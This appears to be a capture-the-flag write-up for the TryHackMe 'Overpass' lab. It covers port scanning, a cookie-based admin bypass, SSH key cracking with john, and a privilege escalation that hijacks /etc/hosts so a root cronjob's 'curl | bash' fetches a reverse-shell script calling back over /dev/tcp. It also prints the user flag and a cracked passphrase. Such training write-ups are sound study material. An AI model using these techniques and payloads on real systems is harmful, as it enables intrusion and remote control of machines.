# Writeup [Overpass](https://tryhackme.com/room/overpass) ## > Let's connect and start the box > as soon as we get ip first start the port scan. ***==nmap -p- -A -T4 -Pn <ip>==*** ``` s9tarting Nmap 7.92 ( https://nmap.org ) at 2022-06-23 13:10 EDT Nmap scan report for 10.10.29.170 Host is up (0.25s latency). Not shown: 998 closed tcp ports (conn-refused) PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0) | ssh-hostkey: | 2048 37:96:85:98:d1:00:9c:14:63:d9:b0:34:75:b1:f9:57 (RSA) | 256 53:75:fa:c0:65:da:dd:b1:e8:dd:40:b8:f6:82:39:24 (ECDSA) |_ 256 1c:4a:da:1f:36:54:6d:a6:c6:17:00:27:2e:67:75:9c (ED25519) 80/tcp open http Golang net/http server (Go-IPFS json-rpc or InfluxDB API) |_http-title: Overpass Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel ``` >so we have only two ports open ssh & http. So let's check http;  >Since we have http link lets check how many directory we can visit. ```[####################] - 12m 240000/240000 0s found:61042 errors:20722 [####################] - 12m 30000/30000 41/s http://10.10.66.152/ [####################] - 12m 30000/30000 41/s http://10.10.66.152/admin [####################] - 12m 30000/30000 41/s http://10.10.66.152/img [####################] - 12m 30000/30000 41/s http://10.10.66.152/css [####################] - 12m 30000/30000 41/s http://10.10.66.152/downloads [####################] - 12m 30000/30000 41/s http://10.10.66.152/downloads/src [####################] - 12m 30000/30000 41/s http://10.10.66.152/aboutus [####################] - 9m 30000/30000 51/s http://10.10.66.152/downloads/builds ``` >let's check the site ##### /aboutus  #### /downloads  there we find `Source Code` given in Downloads ` downloads/src/overpass.go`  >Here we also got nothing useful. We also has `/admin` page let's check these.And there checkout source page.There we got something `/login.js`  Now let's check `login.js`  Here simply code say's if credentials are true or else set cookies of name "SessionToken".But checking website we didn't find any toke so,We can get access bu setting cookies of name "`SessionToken`" and path `\` and value can be any thing.  >Now we restart the page and it will redirect us to `/admin`, yaaaay now we have the RSA key.  So we get rsa private key but while loging in we are asked to enter the passphrase so we have to crack the ssh key with help of `john` by following command. ***==ssh2john sshkey > hash==*** ***==john hash --wordlist=/usr/share/wordlists/rockyou.txt==***  >so we get the passphrase that it want so let's do ssh ***==ssh -i sshkey james@<ip>==*** after that ***==Enter passphrase for key 'sshkey':`james13`==*** there we get  **The user flag is:** thm{65c1aaf000506e56996822c6281e6bf7} >now we ***==cat todo.txt==***  Nothing usefull :( by doing `ls -la` we also get ***.Overpass***  Here we get some cipher and that was `rot47` on decrypting we get `{"name":"System","pass":"saydrawnlyingpicture"}` but where to use don't know so let it be!! ## Now it's Privilage Escalation: >for doing privilage escalation I use `linpeas.sh` > [Linpeas.sh](https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=&cad=rja&uact=8&ved=2ahUKEwiapLKSu8b4AhXx-TgGHRyaBLsQFnoECAcQAQ&url=https%3A%2F%2Fgithub.com%2Fcarlospolop%2Fprivilege-escalation-awesome-scripts-suite%2Ftree%2Fmaster%2FlinPEAS&usg=AOvVaw309l-RiVX5qZhYA8KxOYqQ) >So we have to host a server to get linpeas.sh to james machine ``` sudo python3 -m http.server 80 ``` Then curl it on machine ```curl -o linpeas.sh http://10.10.***.***``` So now we get linpeas in our james machine. So now run `./linpeas.sh` >here we get some interesting under the `cronjob` section  We get to know that it is using curl to ``` curl overpass.thm/downloads/src/buildscript.sh | bash ``` >Also we find `/etc/host`which is writeable were IPs of every hosts is stored  So let's change the the ip of overpass.thm to our localmachine so that we can give our reverse shell scripted `buildscript.sh` to run on james machine.  >Change the ip of overpass.thm to our `tun0 ip` Then make directory to our local machine ***==mkdir overpass.thm/downloads/src==*** ***==vim buildscript.sh==*** ``` #!/bin/bash sh -i >& /dev/tcp/<ip>/6969 0>&1 ``` Now set up the server ***==python3 -m http.server 80==*** ``` Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ... 10.10.249.77 - - [24/Jun/2022 00:48:02] "GET /downloads/src/buildscript.sh HTTP/1.1" 200 - ``` Start listening on your local machine ***==nc -lnvp 6969==*** Now all set !! run the command of crontab ```sudo curl overpass.thm/downloads/src/buildscript.sh``` >After few second we get the shell:)  So we have pass OverPass:))